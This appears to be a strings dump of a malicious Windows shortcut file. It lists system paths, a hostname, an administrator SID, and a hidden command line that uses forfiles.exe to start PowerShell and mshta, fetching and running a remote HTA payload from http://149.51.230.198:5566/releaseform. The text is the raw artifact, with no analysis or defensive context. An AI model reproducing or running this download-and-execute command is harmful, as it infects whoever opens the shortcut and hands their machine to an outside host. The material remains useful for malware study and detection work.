Windows
System32
forfiles.exe
C:\Windows\System32\forfiles.exe
win-3p3leuu4jml
cWindows
gSystem32
forfiles.exe
&..\..\..\Windows\System32\forfiles.exeY/p C:\Windows /m write.exe /c "powershell . mshta http://149.51.230.198:5566/releaseform"
shell32.dll
S-1-5-21-3616130345-2217856920-1476790746-500